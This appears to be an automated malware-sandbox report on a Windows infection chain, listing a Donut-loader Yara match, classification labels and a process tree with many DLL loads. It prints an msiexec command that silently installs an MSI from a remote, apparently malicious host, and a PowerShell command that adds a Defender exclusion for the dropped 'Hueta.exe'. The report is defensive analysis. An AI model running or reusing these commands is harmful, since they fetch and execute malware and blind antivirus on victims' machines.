              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BF4.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FD.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeFile created: C:\Windows\system32\Hueta.exeJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 0_3_000001668763F1D30_3_000001668763F1D3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 0_3_00000166876400B70_3_00000166876400B7
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 0_3_000001668763F6030_3_000001668763F603
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess token adjusted: SecurityJump to behavior
              Source: gr0D62WdkfOXqpbHbRHp.25.drStatic PE information: Number of sections : 11 > 10
              Source: 00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.spre.phis.troj.spyw.evad.win@48/270@43/15
              Source: C:\Windows\System32\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\filemanagers
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7000:120:WilError_03
              Source: C:\Windows\System32\appidpolicyconverter.exeMutant created: PolicyMutex
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.iniJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "HTTPS://cogniai.com"
              Source: unknownProcess created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
              Source: C:\Windows\System32\appidpolicyconverter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /i https://kolepti.com/flare.msi /qn
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
              Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
              Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\Hueta.exe "C:\Windows\system32\Hueta.exe"
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qnJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: appidapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cfgmgr32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: virtdisk.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: servicingcommon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: wdscore.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: dbgcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
